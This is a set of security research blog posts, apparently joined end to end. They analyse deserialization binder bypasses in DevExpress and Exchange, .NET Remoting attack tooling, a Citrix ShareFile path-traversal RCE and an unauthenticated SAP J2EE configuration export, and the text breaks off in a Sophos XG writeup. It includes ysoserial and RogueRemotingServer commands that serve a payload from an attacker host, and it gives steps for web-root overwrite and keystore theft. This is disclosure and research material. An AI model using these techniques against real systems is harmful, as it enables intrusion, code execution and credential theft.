With a breakpoint at DXSerializationBinder.BindToType(string, string), we'll see that the first call to SafeSerializationBinder.Ensure(string, string) gets passed. This is because we use the AQN of System.Data.DataSet as type name while UnsafeTypes.types only contains the full name System.Data.DataSet instead. And as the pair of assembly name mscorlib and type name prefix System. is contained in KnownTypes.typeRanges, it will pass validation.
But now the assembly name and type name are passed to SafeSerializationBinder.EnsureAssemblyQualifiedTypeName(string, string):
That method probably tries to extract the type name and assembly name from an AQN passed in the typeName. It does this by looking for the last position of , in typeName and whether the part behind that position starts with version=. If that's not the case, the loop looks for the second last, then the third last, and so on. If version= was found, the algorithm assumes that the next iteration would also contain the assembly name (remember, the version is the first assembly attribute in the normalized form), flag gets set to true and in the next loop the position of the preceeding , marks the delimiter between the type name and assembly name. At the end, the passed assemblyName value stored in a and the extracted assemblyName values get compared. If they differ, true gets returned an the extracted assembly name and type name are checked by another call to SafeSerializationBinder.Ensure(string, string).
With our AQN passed as type name, SafeSerializationBinder.EnsureAssemblyQualifiedTypeName(string, string) extracts the proper values so that the call to SafeSerializationBinder.Ensure(string, string) throws an exception. That didn't work.
So in what cases does SafeSerializationBinder.EnsureAssemblyQualifiedTypeName(string, string) return false so that the second call to SafeSerializationBinder.Ensure(string, string) does not happen?
There are five return statements: three always return false (lines 28, 36, and 42) and the other two only return false when the passed assemblyName value equals the extracted assembly name (lines 21 and 51).
Let's first look at those always returning false: in two cases (line 28 and 42), the condition depends on whether the typeName contains a ] after the last ,. We can achieve that by adding a custom assembly attribute to our AQN that contains a ], which is perfectly valid:
Now the SafeSerializationBinder.EnsureAssemblyQualifiedTypeName(string, string) returns false without updating the typeName or assemblyName values. Loading the mscorlib assembly will succeed but the specified DataSet type won't be found in it so that DXSerializationBinder.BindToType(string, string) also returns null and the ObjectReader.FastBindToType(string, string) attempts to load the type, which finally succeeds.
Case Study № 2: ChainedSerializationBinder in Exchange Server (CVE-2022-23277)
The ChainedSerializationBinder is used for a BinaryFormatter instance created by Microsoft.Exchange.Diagnostics.ExchangeBinaryFormatterFactory.CreateBinaryFormatter(DeserializeLocation, bool, string[], string[]) to resolve the specified type and then test it against a set of allowed and disallowed types to abort deserialization in case of a violation.
Within the ChainedSerializationBinder.BindToType(string, string) method, the passed assembly name and type name parameters are forwarded to InternalBindToType(string, string) (not depicted here) and then to LoadType(string, string). Note that only if the type was loaded successfully, it gets validated using the ValidateTypeToDeserialize(Type) method.
Inside LoadType(string, string), it is attempted to load the type by combining both values in various ways, either via Type.GetType(string) or by iterating the already loaded assemblies and then using Assembly.GetType(string) on it. If loading of the type fails, LoadType(string, string) returns null and then BindToType(string, string) also returns null while the validation via ValidateTypeToDeserialize(Type) only happens if the type was successfully loaded.
When the ChainedSerializationBinder.BindToType(string, string) method returns to the ObjectReader.Bind(string, string) method, the fallback method ObjectReader.FastBindToType(string, string) gets called for resolving the type. Now as ChainedSerializationBinder.BindToType(string, string) uses a different algorithm to resolve the type than ObjectReader.FastBindToType(string, string) does, it is possible to bypass the validation of ChainedSerializationBinder via the aforementioned tricks.
Here either of the two ways (a custom marshal class or a custom SerializationBinder during serialization) do work. The following demonstrates this with System.Data.DataSet:
If you happen to encounter a SerializationBinder, check how the type resolution and/or validation is implemented and whether BindToType(string, string) has a case that returns null so that the fallback ObjectReader.FastBindToType(string, string) may get a chance to resolve the type instead.
.NET Remoting is the built-in architecture for remote method invocation in .NET. It is also the origin of the (in-)famous BinaryFormatter and SoapFormatter serializers and not just for that reason a promising target to watch for.
This blog post attempts to give insights into its features, security measures, and especially its weaknesses/vulnerabilities that often result in remote code execution. We're also introducing major additions to the ExploitRemotingService tool, a new ObjRef gadget for YSoSerial.Net, and finally a RogueRemotingServer as counterpart to the ObjRef gadget.
.NET Remoting is deeply integrated into the .NET Framework and allows invocation of methods across so called remoting boundaries. These can be different app domains within a single process, different processes on the same computer, or different processes on different computers. Supported transports between the client and server are HTTP, IPC (named pipes), and TCP.
Here is a simple example for illustration: the server creates and registers a transport server channel and then registers the class as a service with a well-known name at the server's registry:
var channel = new TcpServerChannel(12345);
ChannelServices.RegisterChannel(channel);
RemotingConfiguration.RegisterWellKnownServiceType(
typeof(MyRemotingClass),
"MyRemotingClass"
);
Then a client just needs the URL of the registered service to do remoting with the server:
var remote = (MyRemotingClass)RemotingServices.Connect(
typeof(MyRemotingClass),
"tcp://remoting-server:12345/MyRemotingClass"
);
With this, every invocation of a method or property accessor on remote gets forwarded to the remoting server, executed there, and the result gets returned to the client. This all happens transparently to the developer.
If you are interested in how .NET Remoting works under the hood, here are some insights.
In simple terms: when the client connects to the remoting object provided by the server, it creates a RemotingProxy that implements the specified type MyRemotingClass. All method invocations on remote at the client (except for GetType() and GetHashCode()) will get sent to the server as remoting calls. When a method gets invoked on remote, the proxy creates a MethodCall object that holds the information of the method and passed parameters. It is then passed to a chain of sinks that prepare the MethodCall and handle the remoting communication with the server over the given transport.
On the server side, the received request is also passed to a chain of sinks that reverses the process, which also includes deserialization of the MethodCall object. It ends in a dispatcher sink, which invokes the actual implementation of the method with the passed parameters. The result of the method invocation is then put in a MethodResponse object and gets returned to the client where the client sink chain deserializes the MethodResponse object, extracts the returned object and passes it back to the RemotingProxy.
Channel Sinks
When the client or server creates a channel (either explicitly or implicitly by connecting to a remote service), it also sets up a chain of sinks for processing outgoing and incoming requests. For the server chain, the first sink is a transport sink, followed by formatter sinks (this is where the BinaryFormatter and SoapFormatter are used), and ending in the dispatch sink. It is also possible to add custom sinks. For the three transports, the server default chains are as follows:
Note that the default client sink chain has a default formatter for each transport (HTTP uses SOAP, IPC and TCP use binary format) while the default server sink chain can process both formats. The default sink chains are only used if the channel was not created with an explicit IClientChannelSinkProvider and/or IServerChannelSinkProvider.
Passing Parameters and Return Values
Parameter values and return values can be transfered in two ways:
by value: if either the type is serializable (cf. Type.IsSerializable) or if there is a serialization surrogate for the type (see following paragraphs)
by reference: if type extends MarshalByRefObject (cf. Type.IsMarshalByRef)
In case of the latter, the objects need to get marshaled using one of the RemotingServices.Marshal methods. They register the object at the server's registry and return a ObjRef instance that holds the URL and type information of the marshaled object.
The marshaling happens automatically during serialization by the serialization surrogate class RemotingSurrogate that is used for the BinaryFormatter/SoapFormatter in .NET Remoting (see CoreChannel.CreateBinaryFormatter(bool, bool) and CoreChannel.CreateSoapFormatter(bool, bool)). A serialization surrogate allows to customize serialization/deserialization of specified types.
In case of objects extending MarshalByRefObject, the RemotingSurrogateSelector returns a RemotingSurrogate (see RemotingSurrogate.GetSurrogate(Type, StreamingContext, out ISurrogateSelector)). It then calls the RemotingSurrogate.GetObjectData(Object, SerializationInfo, StreamingContext) method, which calls the RemotingServices.GetObjectData(object, SerializationInfo, StreamingContext), which then calls RemotingServices.MarshalInternal(MarshalByRefObject, string, Type). That basically means, every remoting object extending MarshalByRefObject is substituted with a ObjRef and thus passed by reference instead of by value.
On the receiving side, if an ObjRef gets deserialized by the BinaryFormatter/SoapFormatter, the IObjectReference.GetRealObject(StreamingContext) implementation of ObjRef gets called eventually. That interface method is used to replace an object during deserialization with the object returned by that method. In case of ObjRef, the method results in a call to RemotingServices.Unmarshal(ObjRef, bool), which creates a RemotingProxy of the type and target URL specified in the deserialized ObjRef.
That means, in .NET Remoting all objects extending MarshalByRefObject are passed by reference using an ObjRef. And deserializing an ObjRef with a BinaryFormatter/SoapFormatter (not just limited to .NET Remoting) results in the creation of a RemotingProxy.
With this knowledge in mind, it should be easier to follow the rest of this post.
Previous Work
Most of the issues of .NET Remoting and the runtime serializers BinaryFormatter/SoapFormatter have already been identified by James Forshaw:
We highly encourage you to take the time to read the papers/posts. They are also the foundation of the ExploitRemotingService tool that will be detailed in ExploitRemotingService Explained further down in this post.
Security Features, Pitfalls, and Bypasses
The .NET Remoting is fairly configurable. The following security aspects are built-in and can be configured using special channel and formatter properties:
Pitfalls and important notes on these security features:
HTTP Channel
No security features provided; ought to be implemented in IIS or by custom server sinks.
IPC Channel
By default, access to named pipes created by the IPC server channel are denied to NT Authority\Network group (SID S-1-5-2), i. e., they are only accessible from the same machine. However, by using authorizationGroup, the network restriction is not in place so that the group that is allowed to access the named pipe may also do it remotely (not supported by the default IpcClientTransportSink, though).
TCP Channel
With a secure TCP channel, authentication is required. However, if no custom IAuthorizeRemotingConnection is configured for authorization, it is possible to logon with any valid Windows account, including NT Authority\Anonymous Logon (SID S-1-5-7).
ExploitRemotingService Explained
James Forshaw also released ExploitRemotingService, which contains a tool for attacking .NET Remoting services via IPC/TCP by the various attack techniques. We'll try to explain them here.
There are basically two attack modes:
raw
Exploit BinaryFormatter/SoapFormatter deserialization (see also YSoSerial.Net)
all others commands (see -h)
Write a FakeAsm assembly to the server's file system, load a type from it to register it at the server to be accessible via the existing .NET Remoting channel. It is then accessible via .NET Remoting and can perform various commands.
To see the real beauty of his sorcery and craftsmanship, we'll try to explain the different operating options for the FakeAsm exploitation and their effects:
without options
Send a FakeMessage that extends MarshalByRefObject and thus is a reference (ObjRef) to an object on the attacker's server. On deserialization, the victim's server creates a proxy that transparently forwards all method invocations to the attacker's server. By exploiting a TOCTOU flaw, the get_MethodBase() property method of the sent message (FakeMessage) can be adjusted so that even static methods can be called. This allows to call File.WriteAllBytes(string, byte[]) on the victim's machine.
--useser
Send a forged Hashtable with a custom IEqualityComparer by reference that implements GetHashCode(object), which gets called by the victim server on the attacker's server remotely. As for the key, a FileInfo/DirectoryInfo object is wrapped in SerializationWrapper that ensures the attacker's object gets marshaled by value instead of by reference. However, on the remote call of GetHashCode(object), the victim's server sends the FileInfo/DirectoryInfo by reference so that the attacker has a reference to the FileInfo/DirectoryInfo object on the victim.
--uselease
Call MarshalByRefObject.InitializeLifetimeService() on a published object to get an ILease instance. Then call Register(ISponsor) with an MarshalByRefObject object as parameter to make the server call the IConvertible.ToType(Type, IformatProvider) on an object of the attacker's server, which then can deliver the deserialization payload.
Now the problem with the --uselease option is that the remote class needs to return an actual ILease object and not null. This may happen if the virtual MarshalByRefObject.InitializeLifetimeService() method is overriden. But the main principle of sending an ObjRef referencing an object on the attacker's server can be generalized with any method accepting a parameter. That is why we have added the --useobjref to ExploitRemotingService (see also Community Contributions further below):
--useobjref
Call the MarshalByRefObject.GetObjRef(Type) method with an ObjRef as parameter value. Similarly to --uselease, the server calls IConvertible.ToType(Type, IformatProvider) on the proxy, which sends a remoting call to the attacker's server.
Security Measures and Troubleshooting
If no custom errors are enabled and a RemotingException gets returned by the server, the following may help to identify the cause and to find a solution:
Error
Reason
ExampleRemotingService Options
ExploitRemotingService Bypass Options
"Requested Service not found"
The URI of an existing remoting service must be known; there is no way to iterate them.
n/a
--nulluri may work if remoting service has not been servicing any requests yet.
Our research on .NET Remoting led to some new insights and discoveries that we want to share with the community. Together with this blog post, we have prepared the following contributions and new releases.
ExploitRemotingService
The ExploitRemotingService is already a magnificent tool for exploiting .NET Remoting services. However, we have made some additions to ExploitRemotingService that we think are worthwhile:
--useobjref option
This newly added option allows to use the ObjRef trick described
--remname option
Assemblies can only be loaded by name once. If that loading fails, the runtime remembers that and avoids trying to load it again. That means, writing the FakeAsm.dll to the target server's file system and loading a type from that assembly must succeed on the first attempt. The problem here is to find the proper location to write the assembly to where it will be searched by the runtime (ExploitRemotingService provides the options --autodir and --installdir=… to specify the location to write the DLL to). We have modified ExploitRemotingService to use the --remname to name the FakeAsm assembly so that it is possible to have multiple attempts of writing the assembly file to an appropriate location.
--ipcserver option
As IPC server channels may be accessible remotely, the --ipcserver option allows to specify the server's name for a remote connection.
YSoSerial.Net
The new ObjRef gadget is basically the equivalent of the sun.rmi.server.UnicastRef class used by the JRMPClient gadget in ysoserial for Java: on deserialization via BinaryFormatter/SoapFormatter, the ObjRef gets transformed to a RemotingProxy and method invocations on that object result in the attempt to send an outgoing remote method call to a specified target .NET Remoting endpoint. This can then be used with the RogueRemotingServer described below.
RogueRemotingServer
The newly released RogueRemotingServer is the counterpart of the ObjRef gadget for YSoSerial.Net. It is the equivalent to the JRMPListener server in ysoserial for Java and allows to start a rogue remoting server that delivers a raw BinaryFormatter/SoapFormatter payload via HTTP/IPC/TCP.
Example of ObjRef Gadget and RogueRemotingServer
Here is an example of how these tools can be used together:
# generate a SOAP payload for popping MSPaint
ysoserial.exe -f SoapFormatter -g TextFormattingRunProperties -o raw -c MSPaint.exe
> MSPaint.soap
# start server to deliver the payload on all interfaces
RogueRemotingServer.exe --wrapSoapPayload http://0.0.0.0/index.html MSPaint.soap
# test the ObjRef gadget with the target http://attacker/index.html
ysoserial.exe -f BinaryFormatter -g ObjRef -o raw -c http://attacker/index.html -t
During deserialization of the ObjRef gadget, an outgoing .NET Remoting method call request gets sent to the RogueRemotingServer, which replies with the TextFormattingRunProperties gadget payload.
Conclusion
.NET Remoting has already been deprecated long time ago for obvious reasons. If you are a developer, don't use it and migrate from .NET Remoting to WCF.
If you have detected a .NET Remoting service and want to exploit it, we'll recommend the excellent ExploitRemotingService by James Forshaw that works with IPC and TCP (for HTTP, have a look at Finding and Exploiting .NET Remoting over HTTP using Deserialisation by Soroush Dalili). If that doesn't succeed, you may want to try it with the enhancements added to our fork of ExploitRemotingService, especially the --useobjref technique and/or naming the FakeAsm assembly via --remname might help. And even if none of these work, you may still be able to invoke arbitrary methods on the exposed objects and take advantage of that.
Citrix ShareFile Storage Zones Controller uses a fork of the third party library NeatUpload. Versions before 5.11.20 are affected by a relative path traversal vulnerability (CTX328123/CVE-2021-22941) when processing upload requests. This can be exploited by unauthenticated users to gain Remote Code Execution.
Come and join us on a walk-though of finding and exploiting this vulnerability.
Background
Part of our activities here at Code White is to monitor what vulnerabilities are published. These are then assessed to determine their criticality and exploitation potential. Depending on that, we inform our clients about affected systems and may also develop exploits for our offensive arsenal.
A first glance at the files contained in the .msi file revealed the third party library NeatUpload.dll. We knew that the latest version contains a Padding Oracle vulnerability, and since the NeatUpload.dll file had the same .NET file version number as ShareFile (i. e., 5.11.18), chances were that somebody had reported that very vulnerability to Citrix.
After installation of version 5.11.18 of ShareFile, attaching to the w3wp.exe process with dnSpy and opening the NeatUpload.dll, we noticed that the handler class Brettle.Web.NeatUpload.UploadStateStoreHandler was missing. So, it must have either been removed by Citrix or they used an older version. Judging by the other classes in the library, the version used by ShareFile appeared to share similarities with NeatUpload 1.2 available on GitHub.
So, not a quick win, afterall? As we did not find a previous version of ShareFile such as 5.11.17, that we could use to diff against 5.11.18, we decided to give it a try to look for something in 5.11.18.
Finding A Path From Sink To Source
Since NeatUpload is a file upload handling library, our first attempts were focused around analysing its file handling. Here FileStream was a good candidate to start with. By analysing where that class got instantiated, the first result already pointed directly to a method in NeatUpload, the Brettle.Web.NeatUpload.UploadContext.WritePersistFile() method. Here a file gets written with something that appears to be some kind of metrics of an upload request:
By following the call hierarchy, one eventually ends up in Brettle.Web.NeatUpload.UploadHttpModule.Init(HttpApplication), which is the initialization method for System.Web.IHttpModule:
That method is used to register event handlers that get called during the life cycle of an ASP.NET request. That module is also added to the list of modules in C:\inetpub\wwwroot\Citrix\StorageCenter\web.config:
After verifying that there is a direct path from the UploadHttpModule processing a request to a FileStream constructor, we have to check whether the file path and contents can be controlled. Back in UploadContext.WritePersistFile(), both the file path and contents include the PostBackID property value. By following the call hierarchy of the assignment of the UploadContext.postBackID field that backs that property, there is also a path originating from the UploadHttpModule. In FilteringWorkerRequest.ParseOrThrow(), the return value of a FieldNameTranslator.FileFieldNameToPostBackID(string) call ends up in the assignment of that field:
The condition of that if branch is that text5 and text4 are set and that FieldNameTranslator.FileFieldNameToPostBackID(string) returns a value for text4. text5 originates from the filename attribute of a Content-Disposition multi-part header and text4 from its name attribute (see lines 514–517). That means, the request must be a multipart message with one part having a header like this:
As for text6, the FieldNameTranslator.FileFieldNameToPostBackID(string) method call either returns the value of the FieldNameTranslator.PostBackID field if present:
By following the assignment of that FieldNameTranslator.PostBackID field, it becomes clear that the internal constructor of FieldNameTranslator takes it from a request query string parameter:
So, let's summarize our knowledge of the HTTP request requirements so far:
The request path and query string are not yet known, so we'll simply use dummies. This works because HTTP modules are not bound to paths like HTTP handlers are.
Important Checkpoints Along The Route
Let's set some breakpoints at some critical points and ensure they get reached and behave as assumed:
UploadHttpModule.Application_BeginRequest() – to ensure the HTTP module is actually active (the BeginRequest event handler is the first in the chain of raised events)
FieldNameTranslator..ctor() – to ensure the FieldNameTranslator.PostBackID field gets set with our value
FilteringWorkerRequest.ParseOrThrow() – to ensure the multipart parsing works as expected
UploadContext.set_PostBackID(string) – to ensure the UploadContext.postBackID field is set with our value
UploadContext.WritePersistFile() – to ensure the file path and content contain our value
After sending the request, the break point at UploadHttpModule.Application_BeginRequest() should be hit. Here we can also see that the module expects the RawUrl to contain upload and .aspx:
Let's change default.aspx to upload.aspx and send the request again. This time the break point at the constructor of FieldNameTranslator should be hit. Here we can see that the PostBackID field value is taken from a query string parameter named id or uploadid (which is actually configured in the web.config file).
After sending a new request with the query string id=foo, our next break point at FilteringWorkerRequest.ParseOrThrow() should be hit. After stepping through that method, you'll notice that some additional parameters bp and accountid are expected:
Let's add them with bogus values and try it again. This time the break point at UploadContext.WritePersistFile() should get hit where the FileStream gets created:
So, now we have reached the FileStream constructor but the UploadContext.PostBackID field value is null as it hasn't been set yet.
Are We Still On Track?
You may have noticed that the break point at UploadContext.set_PostBackID(string) also hasn't been hit yet. This is because the while loop in FilteringWorkerRequest.ParseOrThrow() uses the result of FilteringWorkerRequest.CopyUntilBoundary(string, string, string) as condition but it returns false on its first call so the while block never gets executed.
When looking at the code of CopyUntilBoundary(string, string, string) (not depicted here), it appears that it fills some buffer with the posted data and returns false if _doneReading is true. The byte array tmpBuffer has a size of 4096 bytes, which our minimalistic example request certainly does not exceed.
After sending a multipart part that is larger than 4096 bytes the break point at the FileStream should get hit twice, once with a null value originating from within the while condition's FilteringWorkerRequest.CopyUntilBoundary(string, string, string) call and once with foo originating from within the while block:
Stepping into the FileStream constructor also shows the resulting path, which is C:\inetpub\wwwroot\Citrix\StorageCenter\context\foo. Although context does not exist, we're already within the document root directory that the w3wp.exe process user has full control of:
Let's prove this by writing a file to it using id=../foo:
We have reached our destination, we can write into the web root directory!
What's In The Backpack?
Now that we're able to write files, how can we exploit this? We have to keep in mind that the id/uploadid parameter is used for both the file path and the content.
That means, the restriction is that we can only use characters that are valid in Windows file system paths. According to the naming conventions of files and paths, the following characters are not allowed:
Characters in range of 0–31 (0x00–0x1F)
< (less than)
> (greater than)
: (colon)
" (double quote)
| (vertical bar or pipe)
? (question mark)
* (asterisk)
Here, especially < and > are daunting as we can't write an .aspx web shell, which would require <% … %> or <script runat="server">…</script> blocks. Binary files like DLLs are also out as they require bytes in the range 0–31.
So, is that the end of this journey? At best a denial of service when overwriting existing files? Have we already tried hard enough?
Running With Razor
If you are a little more familiar with ASP.NET, you will probably know that there are not just Web Forms (i. e., .aspx, .ashx, .asmx, etc.) but also two other web application frameworks, one of them being MVC (model/view/controller). And while the models and controllers are compiled to binary assemblies, the views are implemented in separate .cshtml files. These use a different syntax, the Razor Pages syntax, which uses @ symbol to transition from HTML to C#:
@("Hello, World!")
And ShareFile does not just use Web Forms but also MVC:
Note that we can't just add new views as their rendering is driven by the corresponding controller. But we can overwrite an existing view file like the ConfigService\Views\Shared\Error.cshtml, which is accessible via /ConfigService/Home/Error:
What is still missing now is the writing of the actual payload using Razor syntax. We won't show this here, but here is a hint: unlike Unix-based systems, Windows doesn't require each segment in a file path to exist as it gets resolved symbolically. That means, we could use additional "directories" to contain the payload as long as we "step out" of them so that the resolved path still points to the right file.
Timeline And Fix
Code White reported the vulnerability to Citrix on May 14th. On August 25th, Citrix released the ShareFile Storage Zones Controller 5.11.20 to address this vulnerability by validating the passed value before assigning FieldNameTranslator.PostBackID:
This blog post describes the research on SAP J2EE Engine 7.50 I did between
October 2020 and January 2021. The first part describes how I set off to find a
pure SAP deserialization gadget, which would allow to leverage SAP's P4 protocol
for exploitation, and how that led me, by sheer coincidence, to an entirely
unrelated, yet critical vulnerability, which is outlined in part two.
The reader is assumed to be familiar with Java Deserialization and should have a
basic understanding of Remote Method Invocation (RMI) in Java.
Prologue
It was in 2016 when I first started to look into the topic of Java Exploitation, or,
more precisely: into exploitation of unsafe deserialization of Java objects.
Because of my professional history, it made sense to have a look at an SAP
product that was written in Java. Naturally, the P4 protocol of SAP NetWeaver
Java caught my attention since it is an RMI-like protocol for remote
administration, similar to Oracle WebLogic's T3. In May 2017, I published a
blog post about an exploit that was getting RCE by using the Jdk7u21 gadget. At
that point, SAP had already provided a fix long ago. Since then, the subject
has not left me alone. While there were new deserialization
gadgets for Oracle's Java server product almost every month, it surprised me no one ever heard of
an SAP deserialization gadget with comparable impact. Even
more so, since everybody who knows SAP software knows the vast amount of code
they ship with each of their products. It seemed very improbable to me that
they would be absolutely immune against the most prominent bug class in the
Java world of the past six years. In October 2020 I finally found the time and
energy to set off for a new hunt. To my great disappointment, the search was in
the end not successful. A gadget that yields RCE similar to the ones from the
famous ysoserial project is still not in sight. However in January, I found a
completely unprotected RMI call that in the end yielded administrative access
to the J2EE Engine. Besides the fact that it can be invoked through P4 it has
nothing in common with the deserialization topic. Even though a mere chance
find, it is still highly critical and allows to compromise the security of the underlying
J2EE server.
The bug was filed as CVE-2021-21481. On march 9th 2021, SAP provided a
fix. SAP note 3224022 describes the details.
P4 and JNDI
Listing 1 shows a small program that connects to a SAP J2EE server using P4:
The only hint that this code has something to do with a proprietary protocol
called P4 is the URL that starts with P4://. Other than that, everything is
encapsulated by P4 RMI calls (for those who want to refresh their memory about
JNDI).
Furthermore, it is not obvious that what is going on behind the scenes has
something to do with RMI. However, if you inspect more closely the types of the
involved Java objects, you'll find that keysMngr is of type
com.sun.proxy.$Proxy (implementing interface KeystoreManagerWrapper) and
keysMngr.getKeystore() is a plain vanilla RMI-call. The argument (the name
of the keystore to be instantiated) will be serialized and sent to the server
which will return a serialized keystore object (in this case it won't because
there is no keystore "whatever"). Also not obvious is that the instantiation
of the InitialContext requires various RMI calls in the background, for
example the instantiation of a RemoteLoginContext object that will allow to
process the login with the provided credentials.
Each of these RMI calls would in theory be a sink to send a
deserialization gadget to. In the exploit I mentioned above, one of the first
calls inside new InitialContext() was used to send the Jdk7u21 gadget
(instead of a java.lang.String object, by the way).
Now, since the Jdk7u21 gadget is not available anymore and I was looking for a
gadget consisting merely of SAP classes, I had to struggle with a very annoying
limitation: The classloader segmentation. SAP J2EE knows various types of
software components: interfaces, services, libraries and applications (which
can consist of web applications and EJBs). When you deploy a component, you
have to declare the dependencies to other components your component relies
upon. Usually, web applications depend on 2-3 services and libraries which will
have a couple of dependencies to other services and libraries, as well. At the
bottom of this dependency chain are the core components.
Now, the limitation I was talking about is the fact that the dependency
management greatly affects which classes a component can see: It can precisely
see all classes of all components it relies upon (plus of course JDK classes)
but not more. If your class ships as part of the keystore service above, it
will only be able to resolve classes from components the keystore service
declares as dependencies.
Figure 1: dependencies of the keystore service with all child and parent classloaders
This has dramatic consequences for gadget development. Suppose you found a
gadget whose classes come from components X, Y and Z but there are no
dependencies between these components and in addition, there is no component
which depends on all of them. Then, no matter in which classloader context your
gadget will be deserialized, at least one of X, Y or Z will be missing in the
classpath and the deserialization will end up in a ClassNotFoundException.
By using a similar approach to the one described in the GadgetProbe
project I found out that at the
point the Jdk7u21 gadget was deserialized in the above mentioned exploit, there
were only about 160 non-JDK classes visible that implement
java.io.Serializable. Not ideal for building an exploit.
Going back to listing 1, in case we send a gadget instead of the string
"whatever", we can tell from figure 1 that classes from ten components (the
ones listed beneath "Direct parent loaders") will be in the class path.
Code that sends an arbitrary serializable object instead of the string
"whatever" could e.g. look like this (instead of keysMgr.getKeystore()):
If there was a gadget, one could send it with out.writeObject().
With this approach, the critical mass of accessible serializable classes can be
significantly increased. The telnet interface of SAP J2EE provides useful
information about the services and their dependencies.
Regardless of the classloader challenge, I was eager to get an overview of how
many serializable classes existed in the server. The number of classes in the
core layer, services and libraries amounts to roughly 100,000, and this does
not even count application code. I quickly realized that I needed something
smarter than the analysis features of Eclipse to handle such volumes. So I
developed my own tool which analyses Java bytecode using the OW2 ASM
Framwork. It writes object and interface inheritance
dependencies, methods, method calls and attributes to a SQLite DB. It turned
out that out of the 100,000 classes, about 16,000 implemented
java.io.Serializable. The RDBMS approach was pretty handy since it allowed
build complex queries like
Give classes which are Serializable and Cloneable which implement private void readObject(java.io.ObjectInputStream) and whose toString() method exists and has more than five calls to distinct other methods
This question translates to
The work on this tool and also the process of constantly inventing new and
original queries to find potentially interesting classes was great fun.
Unfortunately, it was also in vain. There is a library, which almost allowed
to build a wonderful chain from a toString() call to the ubiquitous
TemplatesImpl.getOutputProperties(), but the API provided by the library is
so very complex and undocumented that, after two months, I gave up in total frustration.
There were some more small findings which don't really deserve to
be mentioned. However, I'd like to elaborate on one more thing before I'll
start part two of the blog post, that covers the real vulnerability.
One of the first interesting classes I discovered performs a JNDI lookup with
an attacker controlled URL in private void readObject(java.io.ObjectInputStream). What would have been a direct hit four
years ago could at least have been a respectable success in 2020. Remember:
Oracle JRE finally switched off remote classloading when resolving LDAP
references in 2019 in version JRE 1.8.0_191. Had this been exploitable, it
would have opened up an attack avenue at least for systems with outdated JRE.
My SAP J2EE was running on top of a JRE version 1.8.0_51 from 2015, so the JNDI
injection should have worked, but, to my great surprise, it didn't.
The reason can be found in the method getObjectInstance of javax.naming.spi.DirectoryManager:
The hightlighted call to getObjectFactoryFromReference is where an attacker needs to get to. The method resolves the JNDI reference using an URLClassLoader and an attacker-supplied codebase. However, as one can easily see, if getObjectFactoryBuilder() returns a non-null object the code returns in either of the two branches of the following if-clause and the call to getObjectFactoryFromReference below is never reached.
And that is exactly what happens. SAP J2EE registers an ObjectFactoryBuilder of type com.sap.engine.system.naming.provider.ObjectFactoryBuilderImpl. This class will try to find a factory class based on the factoryName-attribute and completely ignore the codebase-attribute of the JNDI reference.
Bottom line is that JNDI injection might never have worked in SAP J2EE, which would eliminate one of the most important attack primitives in the context of Java Deserialization attacks.
CVE-2021-21481
After digressing about how I searched for deserialization gadgets, I'd like to
cover the real vulnerability now, which has absolutely nothing to do with Java
Deserialization. It is a plain vanilla instance of CWE-749: Exposed Dangerous
Method or Function. Let's go back to Listing 1. We can see that the JNDI
context allows to query interfaces by name, in our example we were querying the
KeyStoreManager interface by the name "keystore". On several occasions, I had
already tried to find an available rich client for SAP J2EE Engine
administration that uses P4. Every time I was unsuccessful, I believed such a
client did not officially exist, or at least was not at everyone's disposal.
However, whenever you install a SAP J2EE Engine, the P4 port is enabled by
default and listening on the same network interface as the HTTP(s) services.
Because I was totally focussing on Deserialization, for a long time I
was oblivious how much information one can glean through the JNDI context. E.g.
it is trivial to get all bindings:
The list() call allows to simply iterate through all bindings:
Interesting items are proxy objects and the _Stub objects. E.g. the proxy for
messaging.system.MonitorBean can be cast to
com.sap.engine.messaging.app.MonitorHI.
During debugging of the server, I had already encountered the class
JUpgradeIF_Stub, long before I executed the call from Listing 5. The class
has a method openCfg(String path) and it was not difficult to establish that the
server version of the call didn't perform any authorization check. This one
definitively looked fishy to me, but since I wasn't looking for unprotected RMI
calls I put the finding into the box with the label "check on a rainy sunday
afternoon when the kids are busy with someone else".
But then, eventually, I did check it. It didn't take long to realize that I
had found a huge problem. Compare Listing 6.
The configuration settings of SAP J2EE Engine are organized in a hierarchical
structure. The location of an object can be specified by a path, pretty much
like a path of a file in the file system. The above code gets a reference to
the JUpgradeIF_Stub by querying the JNDI context with name
"MigrationService", gets an instance of a Configuration object by a call to
openCfg() and then walks down the path to the leaf node. The element found there
can be exported to an archive that is stored in the file system of the server
(call to export(String path)). If carefully chosen, the local path on the
server will point to a root folder of a web application. There, download.zip
can simply be downloaded through HTTP. If you want to check for yourself, the
UME configuration is stored at
cluster_config/system/custom_global/cfg/services/com.sap.security.core.ume.service/properties.
You'd probably say "hey! I need to be Administrator to do that! Where's the
harm?". Right, I thought so, too. But neither do you need to be Administrator,
nor do you even have to be authenticated. The following code works perfectly
fine:
So does the enumeration using ctxt.list() from Listing 5. The fact that authentication is
not needed at this point is not new at all by the way, compare CVE-2017-5372.
However, you will get a permission exception when calling
keysMngr.getKeystore() (because getKeystore() does have a permission
check). But JUpgradeIF.openCfg() was missing the check until SAP fixed it.
At this point, even without SAP specific knowledge an attacker can cause
significant harm. E.g. flood the server's file system with archives causing a
resource exhaustion DoS condition.
With a little insider knowledge one can get admin access. In the configuration
tree, there is a keystore called TicketKeystore. Its cryptographic key pair
is used to sign SAP Logon Tickets. If you steal the keystore, you can issue a
ticket for the Administrator user and log on with full admin rights. There
are also various other keystores, e.g. for XML signatures and the like (let
alone the fact that there is tons of stuff in this store. No one probably
knows all the security sensitive things you can get access to ...)
This information should be sufficient to the understanding of CVE-2021-21481.
The exact location of the keystores in the configuration and the relative local
path in order to download the archive by HTTP are left as an exercise to the
reader.
On April 25, 2020, Sophos published a knowledge base
article (KBA) 135412 which warned about a
pre-authenticated SQL injection (SQLi) vulnerability, affecting the XG Firewall
product line. According to Sophos this issue had been actively exploited at
least since April 22, 2020. Shortly after the knowledge base article, a detailed analysis of the so called Asnarök operation
was published. Whilst the KBA focused solely on the SQLi, this write up clearly indicated
that the attackers had somehow extended this initial vector to achieve remote code execution (RCE).
The criticality of the vulnerability prompted us to immediately warn our clients of the issue.
As usual we provided lists of exposed and affected systems.
Of course we also started an investigation into the technical details of the vulnerability.
Due to the nature of the affected devices and the prospect of RCE, this vulnerability sounded like a perfect candidate for a perimeter breach in upcoming red team assessments.
However, as we will explain later, this vulnerability will most likely not be as useful for this task as we first assumed.
Our analysis not only resulted in a working RCE
exploit for the disclosed vulnerability (CVE-2020-12271) but also led to the discovery of
another SQLi, which could have been used to gain code execution (CVE-2020-15504). The
criticality of this new vulnerability is similar to the one used in the
